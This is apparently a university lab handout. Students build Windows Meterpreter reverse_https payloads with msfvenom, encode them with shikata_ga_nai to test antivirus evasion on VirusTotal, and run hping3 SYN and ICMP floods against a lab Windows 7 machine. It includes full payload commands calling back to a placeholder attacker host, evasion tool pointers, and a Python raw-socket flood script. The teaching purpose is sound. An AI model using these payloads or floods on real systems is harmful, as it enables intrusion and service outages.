

Lab-10: Malware Creation and Denial of Service (DoS)

In this lab, you will create a piece of malware by using the Metasploit Framework. You will also launch a Denial of Service (DoS) attack.

Section-1: Create a Malware

Attackers create malicious files for different purposes, such as command and control, defense evasion, and persistence. Pentesters create malicious files for ethical purposes, such as testing the strength of the existing countermeasures. In this lab, you will create a malicious file, and you will explore strategies for evading antivirus systems.

Method-1: Create a malicious file by using msfvenom

  • Log in to Kali VM on your personal computer (as set up in Lab 1).
  • Open a terminal window by clicking the terminal icon on the taskbar.
  • Type msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f exe -o ethical.exe in the terminal window and press Enter. (Note the two dashes before platform; a single long dash will not be accepted.)

You can copy this command and paste it to the terminal window of the Kali VM.

  • After running this command, a file named ethical.exe will be created in the current directory.

Notes:

msfvenom is a command-line tool within the Metasploit Framework. It generates payloads (for example raw shellcode or a reverse shell) and packages them in a chosen output format such as a Windows executable. The following page lists the different kinds of malicious shells that can be made with msfvenom; have a look at the headings: https://burmat.gitbook.io/security/hacking/msfvenom-cheetsheet. If you want to learn more about msfvenom, refer to https://www.offensive-security.com/metasploit-unleashed/msfvenom/

LHOST (Local Host): Specifies the attacker’s IP address. When the victim runs this executable, it will establish a connection to that IP address. Here the address is 10.10.10.10, a placeholder chosen for this lab; nothing will connect to that address in this lab.

LPORT (Local Port): Specifies the port on which the attacker machine (10.10.10.10) will listen to incoming connections from the victim machine. In this example, when the victim runs the executable, the victim’s computer will create a connection to port 443 at the attacker machine (10.10.10.10). After the victim makes a connection to the attacker machine, the attacker can start performing malicious activities, including controlling the victim machine, accessing sensitive information, deleting files, etc.

Port 443 is a common choice for this kind of callback because outbound connections to it are allowed by almost every firewall and router on the Internet and on LANs (Local Area Networks). It is the default port for HTTPS, that is, TLS-encrypted web traffic, so the encrypted reverse_https session blends in with ordinary browsing.

The reverse_https payload makes the victim’s computer initiate the connection: once the victim runs the file, it connects out to the attacker’s HTTPS listener rather than waiting for the attacker to connect in, which is why it passes through firewalls that block inbound connections.

The other parameters of msfvenom are relatively more straightforward. x86 specifies the architecture; the running platform will be Windows, file-type will be exe, and the output filename will be ethical.exe.

You will now upload the malicious file to VirusTotal to see how antivirus vendors detect it. Keep in mind that VirusTotal shares uploaded samples with the vendors; that is fine for this lab file, but a real engagement payload should never be uploaded there, because doing so burns it.

  • Open the Firefox browser at your Kali VM and visit virustotal.com
  • On the file tab, click on the File icon
  • In the open dialog box, click on the home button at the left menu
  • Select ethical.exe and click the OK button
  • On the VirusTotal screen, click on the “Confirm upload” button

Review the results. Notice how antivirus vendors label the file you created.

Take a screenshot of the VirusTotal result page showing the detection ratio graphic at the top left of the page and some vendor results.

Method-2: Create an encoded malicious file by using msfvenom

In this part, you will incorporate encoding to reduce the detection ratio by antivirus vendors. Please continue working at Kali VM hosted on your computer.

  • Type msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -e x86/shikata_ga_nai -f exe -o ethical-encoded.exe at the terminal screen.

You can copy and paste the command.

Note: shikata_ga_nai, also known as SGN, is one of the most popular encoders in the Metasploit Framework. It is a polymorphic XOR additive-feedback encoder, so the encoded bytes look different every time it runs. Shikata ga nai means “nothing can be done” (it cannot be helped) in Japanese, implying that antivirus vendors could do nothing about a file encoded with it. That was true when it was created; today most vendors label SGN-encoded files as malicious.

  • After running this command, a file named ethical-encoded.exe will be created.
  • Upload the file to VirusTotal and review the results. Notice how antivirus vendors label the file you created and how it changed after encoding.

Take a screenshot of the VirusTotal result page showing the detection ratio graphic at the top left of the page and some vendor results.

Method-3: Create a malicious file by iterating the encoding process ten times using msfvenom

In this part, you will create a malicious file by encoding it ten times, so that we expect to see a lower detection ratio on VirusTotal. Please continue working at Kali VM hosted on your computer.

  • Type msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -e x86/shikata_ga_nai -i 10 -f exe -o ethical-encoded10.exe at the terminal screen.

You can copy and paste the command.

Note: the -i 10 option runs the encoder ten times, each pass encoding the output of the previous one.

  • After running this command, a file named ethical-encoded10.exe will be created.
  • Upload the file to VirusTotal and review the results.

Take a screenshot of the VirusTotal result page showing the detection ratio graphic at the top left of the page and some vendor results.

Note that the detection ratios of Method-1, 2, and 3 will not differ much. SGN is now well known to vendors: the encoded bytes change with every run, but the small decoder stub that must be prepended to decode them does not, and more iterations only nest more copies of that stub. It was a very effective way to evade antivirus software until around 2017. Nowadays, pentesters more often take the Python, C, or PowerShell output of msfvenom and build it into a binary with a different toolchain, for example py2exe (https://pypi.org/project/py2exe/), PyInstaller (https://realpython.com/pyinstaller-python/), or iSMET (https://github.com/Privia-Security/iSMETv2.0).
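The note above says that re-encoding barely moves the detection ratio. As an added example, not part of this lab and not Metasploit’s own encoder, the Python below implements a simplified additive-feedback XOR scheme in the style of x86/shikata_ga_nai and shows why: the body bytes change with every key, and -i style nesting changes them again, but the decoder stub at the front is the same in every sample, so a signature on the stub matches all of them. The stub bytes, the feedback rule, and the sample payload are constructed stand-ins, not real shellcode and not the real SGN stub.

```python
import struct

# Constructed stand-in for the decoder stub that a real SGN output prepends
# to the encoded bytes. It is fixed on purpose: that is the point.
DECODER_STUB = bytes.fromhex("d9eed97424f45b33c9b10b31")
# Constructed sample payload (plain text, not real shellcode).
SAMPLE_PAYLOAD = b"MSF-LAB-SAMPLE-PAYLOAD-BYTES"
MASK = 0xFFFFFFFF


def _pad4(data: bytes) -> bytes:
    """Pad to a whole number of 32-bit words; the encoder works dword by dword."""
    return data + b"\x00" * (-len(data) % 4)


def encode(payload: bytes, key: int) -> bytes:
    """XOR each dword with a rolling key, then fold the plaintext dword into the
    key (additive feedback), so every output word depends on all earlier input."""
    out = bytearray()
    for (word,) in struct.iter_unpack("<I", _pad4(payload)):
        out += struct.pack("<I", word ^ key)
        key = (key + word) & MASK
    return bytes(out)


def decode(blob: bytes, key: int) -> bytes:
    """Mirror of encode: what the decoder stub does at run time."""
    out = bytearray()
    for (enc,) in struct.iter_unpack("<I", blob):
        word = enc ^ key
        out += struct.pack("<I", word)
        key = (key + word) & MASK
    return bytes(out)


def wrap(payload: bytes, key: int) -> bytes:
    """One encoder pass (-e x86/shikata_ga_nai -i 1): stub || key || encoded body."""
    return DECODER_STUB + struct.pack("<I", key) + encode(payload, key)


def unwrap(sample: bytes) -> bytes:
    """Peel one layer the way the stub would: find itself, read its key, decode."""
    if not sample.startswith(DECODER_STUB):
        raise ValueError("no decoder stub at the start of the sample")
    off = len(DECODER_STUB)
    (key,) = struct.unpack("<I", sample[off:off + 4])
    return decode(sample[off + 4:], key)


def wrap_iterated(payload: bytes, keys) -> bytes:
    """Equivalent of -i N: each pass encodes the entire output of the previous one,
    stub included, so the result is N nested stubs around the payload."""
    sample = payload
    for key in keys:
        sample = wrap(sample, key)
    return sample


def unwrap_iterated(sample: bytes, iterations: int) -> bytes:
    """Peel N layers, outermost first; each layer carries its own key."""
    for _ in range(iterations):
        sample = unwrap(sample)
    return sample


def body(sample: bytes) -> bytes:
    """Encoded bytes after the outermost stub and key; these change with the key."""
    return sample[len(DECODER_STUB) + 4:]


def stub_signature_hit(sample: bytes) -> bool:
    """A static signature on the stub: unaffected by key choice or iteration count."""
    return DECODER_STUB in sample


if __name__ == "__main__":
    one = wrap(SAMPLE_PAYLOAD, 0xDEADBEEF)
    two = wrap(SAMPLE_PAYLOAD, 0x0BADF00D)
    ten = wrap_iterated(SAMPLE_PAYLOAD, [0x11111111 + i for i in range(10)])
    print("bodies differ between keys:", body(one) != body(two))
    print("stub signature hits all three:",
          all(stub_signature_hit(s) for s in (one, two, ten)))
    print("ten layers round-trip:", unwrap_iterated(ten, 10) == SAMPLE_PAYLOAD)
```

Run it on Kali with python3 and compare the three printed lines with your VirusTotal results: the bodies differ, but every sample still carries the same stub, which is what static detection keys on. Tools that rebuild the payload with a different toolchain avoid shipping a known stub at all.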

Section-2: Denial of Service (DoS) Attack

DoS attacks make computer or network resources (such as CPU, RAM, and bandwidth) unavailable to their users. A DoS attack can be performed by sending an excessive volume of otherwise legitimate packets to the target computer or network to keep it busy with your requests. Sending a malformed packet that crashes the remote system is another form of DoS attack. There are many different kinds of DoS attacks. Slowloris, GET floods, Hashdos, and Slow POST work at the application layer. SYN flood and UDP flood are transport-layer attacks. Ping flood, ping of death, and teardrop (which abuses IP fragment reassembly) occur at the network layer.

If a DoS attack is carried out by many computers or devices at once, it is called a Distributed DoS (DDoS) attack. Smurf is a network-layer DDoS technique in which ICMP echo requests (pings) with a spoofed source address are sent to a network’s broadcast address, so that every host on that network replies. Because the spoofed source address is the victim’s IP address, all the ping replies go to the victim and cause it to respond slowly or crash.

You can check this page to see how any organization, including the largest ones, can become the victim of a DDoS attack and how dangerous such an attack can be: https://www.pcmag.com/news/amazon-mitigates-biggest-ever-ddos-attack

In this section, you will perform two DoS attacks: a SYN flood attack and an ICMP flood attack.  You will use the Netlab environment to complete this section.

Method-1: SYN Flood

The topology and attack scenario is shown below. Please review it before starting the lab.

  • Select Windows 7 Target on the Netlab environment.
  • Once you are automatically logged on to Windows 7, right-click on the taskbar and click on Start Task Manager to open the Windows Task Manager. Click on the Performance tab of the Task Manager.

You will observe how the DoS attack affects the CPU usage on the target computer. For now, monitor the CPU usage; it should be mostly 0%.

  • Switch to Windows 7 Attacker.
  • Open a cmd window by clicking the start menu and clicking on the Command Prompt
  • Type start \\192.168.2.13 in the cmd window and press Enter to open a connection to the Windows 7 Target computer over port 445 (SMB).

This command will open a new Explorer window showing the shared folders and printers on Windows 7 Target. (There are no shared folders or printers, so you will see an empty Explorer window.)

Note how quickly the Explorer window opened after you ran the command. You can close the Explorer window and rerun the command to check the speed.

Note: In the context of this lab, Windows 7 Attacker computer is not an attacker, but a legitimate user trying to use the resources of Windows 7 Target.

  • Switch to Kali Linux.
  • Open a terminal window by clicking the terminal icon on the taskbar.
  • Type hping3 -S --flood -p 445 192.168.2.13 in the terminal window and press Enter. (Two dashes before flood.)

This will start a SYN flood attack against port 445 (SMB service) of Windows 7 Target.

  • Switch to Windows 7 Target again and check how CPU usage has peaked. (Task Manager itself may lag or fail to redraw, because the flood leaves Windows 7 Target little spare CPU.)
  • Switch to Windows 7 Attacker. Close any Explorer windows you opened, type start \\192.168.2.13 in the cmd window, and press Enter.

Confirm that the Explorer window does not open, or opens only after a long delay, because of the DoS attack against Windows 7 Target.

  • Switch to Kali Linux again and press CTRL-C at the terminal window. This will stop the SYN flood attack.
  • Switch to Windows 7 Target and observe that CPU usage again becomes around 0%.

Take a screenshot of the Task Manager.

  • Switch to Windows 7 Attacker and close any previous Explorer windows. Type start \\192.168.2.13 in the cmd window and press Enter. Once again, the Explorer window will open very quickly.

Method-2: ICMP Flood

The topology and attack scenario is shown below. Please review it before starting the lab.

  • Select Windows 7 Target on the Netlab environment.
  • Once you are automatically logged on to Windows 7, right-click on the taskbar and click on Start Task Manager to open the Windows Task Manager. Click on the Networking tab of the Task Manager.

You will observe how the DoS attack affects the network utilization on the target computer. For now, monitor the utilization; it should be 0%.

  • Switch to Windows 7 Attacker.
  • Open a cmd window by clicking the start menu and clicking on the Command Prompt
  • Type ping -t 192.168.2.13 in the cmd window and press Enter to ping the Windows 7 Target computer continuously until you stop it by pressing CTRL-C.

Note that ping replies from Windows 7 Target arrive in less than 1 ms.

Note: In the context of this lab, Windows 7 Attacker computer is not an attacker, but a legitimate user trying to use the resources of Windows 7 Target.


  • Open Kali Linux on the Netlab environment.
  • Open a terminal window by clicking the terminal icon on the taskbar.
  • Type hping3 -1 --flood 192.168.2.13 in the terminal window and press Enter. (Two dashes before flood.)

This will start the ICMP flood attack against Windows 7 Target.

  • Switch to Windows 7 Target again and check how network utilization has peaked.
  • Switch to Windows 7 Attacker.

Confirm that you see “Request timed out.” messages. This means that Windows 7 Target is so busy that it cannot even reply to a single ping request coming from Windows 7 Attacker.

Take a screenshot of the command prompt.

  • Switch to Kali Linux again and press CTRL-C at the terminal window. This will stop the ICMP flood attack.
  • Switch to Windows 7 Target and observe that network utilization again becomes 0%.

Take a screenshot of the Task Manager.

  • Switch to Windows 7 Attacker. Check that ping replies are again coming from Windows 7 Target.
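To see what hping3 actually puts on the wire in Method-1 and Method-2, here is an added example, not part of the lab and not hping3’s own code: a Python packet builder for the two floods, a TCP SYN to port 445 (hping3 -S -p 445) and an ICMP echo request (hping3 -1), each wrapped in an IPv4 header with a correct Internet checksum, plus a verifier that rechecks the packet the way a receiver would. The target address 192.168.2.13 is the lab’s; the attacker address 192.168.2.10, the source ports, the identifiers, and the ICMP payload are constructed assumptions. Sending needs a raw socket and root, so the flood loop only runs if you call it yourself on Kali.

```python
import socket
import struct

ATTACKER = "192.168.2.10"   # assumed Kali address on the lab network (constructed)
TARGET = "192.168.2.13"     # Windows 7 Target, from the lab
SMB_PORT = 445


def checksum(data: bytes) -> int:
    """RFC 1071 Internet checksum: one's-complement sum of 16-bit words, complemented."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ipv4_header(src: str, dst: str, proto: int, payload_len: int, ident: int = 0x1337) -> bytes:
    """20-byte IPv4 header, TTL 64, no options; checksum filled in at offset 10."""
    ver_ihl = (4 << 4) | 5
    hdr = struct.pack("!BBHHHBBH4s4s", ver_ihl, 0, 20 + payload_len, ident, 0, 64, proto, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    return hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]


def tcp_syn(src: str, dst: str, sport: int, dport: int, seq: int = 0) -> bytes:
    """TCP header with only the SYN flag set; the checksum also covers the pseudo-header."""
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x02, 8192, 0, 0)
    pseudo = struct.pack("!4s4sBBH", socket.inet_aton(src), socket.inet_aton(dst),
                         0, socket.IPPROTO_TCP, len(hdr))
    return hdr[:16] + struct.pack("!H", checksum(pseudo + hdr)) + hdr[18:]


def icmp_echo(ident: int = 0x4242, seq: int = 1, payload: bytes = b"hping3-lab") -> bytes:
    """ICMP echo request (type 8, code 0); checksum covers header and payload."""
    hdr = struct.pack("!BBHHH", 8, 0, 0, ident, seq)
    return struct.pack("!BBHHH", 8, 0, checksum(hdr + payload), ident, seq) + payload


def syn_packet(sport: int) -> bytes:
    """One packet of the Method-1 flood: IPv4 + SYN to TCP/445."""
    seg = tcp_syn(ATTACKER, TARGET, sport, SMB_PORT)
    return ipv4_header(ATTACKER, TARGET, socket.IPPROTO_TCP, len(seg)) + seg


def icmp_packet(seq: int) -> bytes:
    """One packet of the Method-2 flood: IPv4 + ICMP echo request."""
    msg = icmp_echo(seq=seq)
    return ipv4_header(ATTACKER, TARGET, socket.IPPROTO_ICMP, len(msg)) + msg


def verify(packet: bytes) -> dict:
    """Recompute both checksums as the target's stack would (a valid one sums to 0)
    and report what kind of packet this is."""
    ihl = (packet[0] & 0x0F) * 4
    ip, body = packet[:ihl], packet[ihl:]
    proto = ip[9]
    ip_ok = checksum(ip) == 0
    if proto == socket.IPPROTO_TCP:
        pseudo = struct.pack("!4s4sBBH", ip[12:16], ip[16:20], 0, proto, len(body))
        return {"proto": "tcp", "ip_ok": ip_ok, "l4_ok": checksum(pseudo + body) == 0,
                "dport": struct.unpack("!H", body[2:4])[0], "syn_only": body[13] == 0x02}
    if proto == socket.IPPROTO_ICMP:
        return {"proto": "icmp", "ip_ok": ip_ok, "l4_ok": checksum(body) == 0,
                "echo_request": body[0] == 8 and body[1] == 0}
    return {"proto": proto, "ip_ok": ip_ok}


def flood(build, count: int) -> None:
    """Send `count` packets through a raw socket (root only). IP_HDRINCL tells the
    kernel to use our IPv4 header instead of building its own."""
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
    s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
    try:
        for i in range(count):
            s.sendto(build(1024 + (i % 60000)), (TARGET, 0))
    finally:
        s.close()


if __name__ == "__main__":
    print(verify(syn_packet(40000)))
    print(verify(icmp_packet(1)))
    # flood(syn_packet, 100000)   # as root on Kali: roughly hping3 -S --flood -p 445 192.168.2.13
    # flood(icmp_packet, 100000)  # as root on Kali: roughly hping3 -1 --flood 192.168.2.13
```

Without --rand-source, hping3 (like this script) uses Kali’s real source address, so the SYN-ACKs and echo replies come back to Kali, whose kernel answers the unexpected SYN-ACKs with RSTs; that return traffic is part of what you would see in a capture on the target. A per-source threshold on SYN or echo-request rate, or SYN cookies on the target, is the kind of countermeasure the reflection section asks you to consider.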


Weekly Learning and Reflection

In two to three paragraphs (i.e., sentences, not bullet lists), using APA style citations if needed, summarize and interact with the content covered in this lab. Summarize what you did as an attacker, what kind of vulnerabilities you exploited, and what might have prevented these attacks. Mention the attackers and all of the targets in your summary. You can provide topologies, sketches, or graphics if you want. In particular, highlight what surprised, enlightened, or otherwise engaged you. You should think and write critically, not just about what was presented but also about what you have learned through the session. You can ask questions about the things you’re confused about. Questions asked here will be summarized and answered anonymously in the next class.